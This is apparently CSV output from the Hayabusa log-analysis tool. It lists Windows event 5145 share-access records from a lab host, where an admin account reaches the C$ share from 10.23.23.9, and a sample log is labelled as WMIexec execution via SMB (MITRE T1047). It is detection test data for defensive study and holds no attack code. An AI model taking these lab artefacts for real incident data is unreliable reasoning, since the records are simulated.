2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
